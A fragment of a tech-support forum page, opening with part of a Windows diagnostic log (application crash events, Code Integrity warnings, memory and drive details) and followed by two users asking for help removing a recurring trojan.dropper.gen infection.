Description: FalloutNV.exe1.4.0.5254e0d50edFalloutNV.exe1.4.0.5254e0d50edc0000005004232b52c4c01cffb75dc2e1c3cC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exeC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exe2309037f-67b2-11e4-a553-6c626d9e55b8

Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: chrome.exe38.0.2125.1115447163bntdll.dll6.1.7601.18247521ea8e7c0000374000ce753c1001cffb1f87a3d830C:\Program Files (x86)\Google\Chrome\Application\chrome.exeC:\Windows\SysWOW64\ntdll.dll9d5c5460-6713-11e4-a553-6c626d9e55b8

Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp

Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp

CodeIntegrity Errors:
===================================
Date: 2011-12-05 22:19:14.852
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2011-12-05 22:10:09.618
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2011-12-05 22:03:00.342
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2011-12-05 21:51:41.439
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2011-12-05 21:41:31.323
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2011-12-01 21:31:57.630 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 19:53:29.363 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 18:55:19.639 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:37:01.322 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:22:56.207 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. 
==================== Memory info =========================== Processor: Intel® Core i5 CPU 750 @ 2.67GHzPercentage of memory in use: 43%Total physical RAM: 4031.29 MBAvailable physical RAM: 2292.86 MBTotal Pagefile: 8060.76 MBAvailable Pagefile: 5054.2 MBTotal Virtual: 8192 MBAvailable Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (Hard Drive) (Fixed) (Total:289.83 GB) (Free:29.36 GB) NTFSDrive d: (HP_RECOVERY) (Fixed) (Total:6.25 GB) (Free:0.77 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive f: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive g: () (Fixed) (Total:232.68 GB) (Free:9.99 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6233878F)Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)Partition 2: (Not Active) - (Size=289.8 GB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=6.2 GB) - (Type=07 NTFS) ========================================================Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.8 GB) (Disk ID: 08000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=232.7 GB) - (Type=07 NTFS) ==================== End Of Log ============================
  24. Hi, thank you in advance for helping out. It looks like many other users on the front page are currently experiencing the same problem. So, about a week and a half ago, my laptop was running extraordinarily slow and overheating. I noticed a bunch of dllhost.exe*32 processes running in the background that just kept popping up every time I shut down the process. A couple of days later, my anti-virus software kept detecting and removing a trojan.dropper.gen infection that keeps coming up. I'm not sure whether these two are related. A quick search on Google tells me that this malware might be a hell of a lot more dangerous than it appears. Please help me remove all the instances of this malware from my computer. It seems to be slipping through the antivirus / antimalware. Thank you in advance!!!
  25. Greetings, all! I ran into the same virus that a lot of people on this forum are coming in contact with... Please advise the best starting point to get rid of this awful thing? I have attempted to mirror the efforts by others on this site and had some success but now it is back with a vengeance. Please advise - Thank you!